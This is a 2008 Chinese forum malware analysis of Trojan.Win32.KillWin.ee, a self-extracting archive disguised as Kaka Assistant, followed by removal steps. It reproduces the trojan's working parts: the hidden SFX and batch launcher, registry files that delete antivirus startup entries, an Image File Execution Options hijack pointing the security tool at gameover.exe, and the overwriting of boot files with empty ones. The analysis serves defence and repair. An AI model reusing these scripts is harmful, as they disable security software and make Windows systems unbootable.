专杀:Trojan.Win32.KillWin.ee,gameover.exe

Simen.Resh@d

作者：Greysign

一、 病毒标签：
病毒名称： Trojan.Win32.KillWin.ee
病毒类型： 病毒
文件 MD5：5464d3281849e918da7f1c847adb9fbf
文件长度：  169 KB (173,614 字节)
公开范围： 完全公开
危害等级： C
加壳类型： 无壳
命名对照：  
F-Secure  Trojan.Win32.KillWin.ee
Ikarus  Trojan.Win32.Agent.aks


二、 病毒描述：
该病毒为WINRAR自解压缩包，图标经过修改为卡卡助手的图标：

释放BAT和REG命令的执行文件。通过命令删除卡卡助手的启动项目来防止卡卡的启动。再劫持卡卡的主程序指向gameover.exe，启动gameover.exe破坏系统。

三、 行为分析：
该程序使用自动解压缩命令解压并执行文件：
;下面的注释包含自解压脚本命令
Path=%SystemRoot%\system32\
SavePath
Setup=hidecmd.exe kv.bat
Silent=1
Overwrite=1
执行hidecmd.exe（隐藏执行BAT）用参数调用kv.bat隐藏执行。
kv.bat的内容为：
@echo off
%SystemRoot%\regedit /s kaka.reg
%SystemRoot%\regedit /s gameover.reg
Exit
导入2个REG文件。
kaka.reg：
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]
"Installed"="1"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]
"Installed"="1"
删除了卡卡助手的相关启动。
gameover.reg：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]
"Debugger"="C:\\winnt\\system32\\gameover.exe"
劫持卡卡主程序指向释放的病毒。
可以看出作者针对的是WIN2K系列，因为刚才的WINRAR释放脚本使用的是环境变量%SystemRoot%\system32\，在XP里是WINDOWS\system32\，在WIN2K系列系统才是WINNT文件夹。所以这个劫持指向无效。
gameover.exe也是一个自解压缩包：
;下面的注释包含自解压脚本命令
Path=C:\
SavePath
Silent=1
Overwrite=1
释放了0字节的同名空文件替换以下系统文件，破坏系统启动：
AUTOEXEC.BAT
boot.ini
bootfont.bin
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
Ntldr

解决方案：
从其他电脑或者系统光碟复制以上系统文件进行修复。
删除%SystemRoot%\system32\gameover.exe
重装卡卡。
注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%   = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
     %Windir%\       WINDODWS所在目录
%DriveLetter%\    逻辑驱动器根目录
%ProgramFiles%\    系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录

专杀.rar (5.09 KB, 下载次数: 2)

2008-2-14 19:42 上传

点击文件名下载附件

A级
大面积感染流行，并具有以下条件中的任意一个给网络造成严重压力、开有后门、反制AV技术。
B级
有一定的感染流行面积，或者有鲜明的技术特点值得进一步关注，或为既往A级蠕虫比较成熟的变种
C级
有少量感染流行，或虽然有一定感染流行面积，但是既往B级蠕虫变种。
D级
有极少量感染流行，但有一定潜在威胁。
E级
没有发现感染流行。

[ 本帖最后由 Simen.Resh@d 于 2008-2-14 19:42 编辑 ]